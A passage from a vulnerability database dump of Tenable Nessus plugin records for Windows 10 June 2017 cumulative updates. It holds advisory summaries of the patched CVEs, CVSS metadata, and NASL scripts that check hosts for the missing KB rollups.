JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022714/windows-10-update-kb4022714\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?46ed25c8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022714 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkb = make_list(\n '4022714' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022714)))\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows 10 version 1507 host is missing security update\nKB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0218,\n CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)", "edition": 42, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022727.NASL", "href": "https://www.tenable.com/plugins/nessus/100765", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100765);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022727\");\n script_xref(name:\"MSFT\", value:\"MS17-4022727\");\n\n script_name(english:\"KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0218,\n CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n\n # https://support.microsoft.com/en-us/help/4022727/windows-10-update-kb4022727\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05d092f6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022727 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022727' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows 10 version 1703 host is missing security update\nKB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling 